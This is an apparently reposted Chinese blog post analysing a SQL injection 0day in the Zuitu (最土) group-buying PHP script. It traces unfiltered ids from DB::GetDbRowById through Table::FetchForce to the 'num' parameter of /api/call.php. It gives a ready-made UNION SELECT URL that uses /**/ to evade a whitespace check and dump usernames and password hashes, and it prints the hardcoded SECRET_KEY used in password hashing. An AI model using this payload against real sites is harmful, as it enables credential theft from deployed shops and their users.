前天在微博上看到知道创宇发出的最土团购0day,前天晚上下了源码看了下,由于只是针对微博上截图看的,应该分析的不全面,
关于知道创宇截获的那个最土0day漏洞预警
。先看页面:./include/library/DB.class.php,代码如下:
---------------code-----------------
static public function GetDbRowById($table, $ids=array()) {
$one = is_array($ids) ? false : true;
settype($ids, 'array');
//var_dump($ids);
$idstring = join('\',\'', $ids);
if(preg_match('/[\s]/', $idstring)) return array();//不可以有空格,用/**/代替
$q = "SELECT * FROM `{$table}` WHERE id IN ('{$idstring}')";
//var_dump($q);
$r = self::GetQueryResult($q, $one);//没有过滤,直接查询了
if ($one) return $r;
return Utility::AssColumn($r, 'id');
}
------------------code---------------
然后搜索函数GetDbRowById(),发现只有在文件:./include/library/Table.class.php中有调用,代码如下:
--------------------code0--------------
static private function _Fetch($n=null, $ids=array()) {
$r = Cache::GetObject($n, $ids);
$diff = array_diff($ids, array_keys($r));
if(!$diff) return $r;
$rr = DB::GetDbRowById($n, array_values($diff));
Cache::SetObject($n, $rr);
$r = array_merge($r, $rr);
return Utility::SortArray($r, $ids, 'id');
}
static public function FetchForce($n=null, $ids=array()) {
if ( empty($ids) || !$ids ) return array();
$single = is_array($ids) ? false : true;
settype($ids, 'array'); $ids = array_values($ids);
$ids = array_diff($ids, array(NULL));
//var_dump($ids);
$r = DB::GetDbRowById($n, $ids);
//var_dump($r);
Cache::SetObject($n, $r);
return $single ? array_pop($r):Utility::SortArray($r,$ids,'id');
}
----------------------code---------------------
然后跟踪搜索函数static public function FetchForce(),发现有很多页面都有调用,
电脑资料
《关于知道创宇截获的那个最土0day漏洞预警》(https://www.unjs.com)。
刚开始的时候随便找了个页面看,结果不爆错,不过从输出的调试语句看,确实是可以注入。既然不能爆错,就只能找可以显示结果的页面来联合查询了。找到页面./api/call.php,部分代码如下:
-----------------code--------------
require_once(dirname(dirname(__FILE__)) . '/app.php');
$action = strval($_GET['action']);
$callerid = strval($_GET['callerid']);
$cid = strval($_GET['num']);//这里是外界提交的数据
$sec = strval($_GET['secret']);
$allow = array('query','consume');
if (false==in_array($action, $allow)) redirect(WEB_ROOT . '/index.php');
header('Content-Type: application/xml; charset=UTF-8');
//优惠券查询
if($action == 'query') {
$coupon = Table::FetchForce('coupon', $cid);
$partner = Table::Fetch('partner', $coupon['partner_id']);
$team = Table::Fetch('team', $coupon['team_id']);
$e = date('Y-m-d', $team['expire_time']);
…..
…..
…..
------------code---------------------------
利用语句:
http://www.myhack58.com /api/call.php?action=query&num=123'%29/**/union/**/select/**/1,2,3,concat(0x7e,0x27,username,0x7e,0x27,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23
不过密码有点坑,加了SECRET_KEY的。页面./include/classes/ZUser.class.php,代码如下:
----------------------code--------------
const SECRET_KEY = '@4!@#$%@';
static public function GenPassword($p) {
return md5($p . self::SECRET_KEY);
}
---------------code---------------------